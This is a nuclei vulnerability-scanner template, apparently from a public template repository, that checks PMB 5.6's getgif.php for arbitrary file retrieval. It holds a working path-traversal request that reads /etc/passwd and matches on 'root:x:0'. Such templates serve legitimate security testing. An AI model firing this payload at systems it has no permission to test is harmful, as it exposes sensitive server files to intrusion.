nuclei-templates/vulnerabilities/other/pmb-local-file-disclosure.yaml

24 lines
493 B
YAML
Raw Normal View History

2021-03-12 17:12:45 +00:00
id: pmb-local-file-disclosure
info:
name: PMB 5.6 - getgif.php Arbitrary File Retrieval
2021-03-12 17:12:45 +00:00
author: dhiyaneshDk
severity: high
reference:
- https://www.exploit-db.com/exploits/49054
2021-09-09 13:38:13 +00:00
tags: lfi,pmb
2021-03-12 17:12:45 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "root:x:0"